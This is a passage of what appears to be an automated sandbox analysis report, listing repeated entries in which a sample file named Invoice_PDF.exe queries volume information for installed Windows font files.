                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
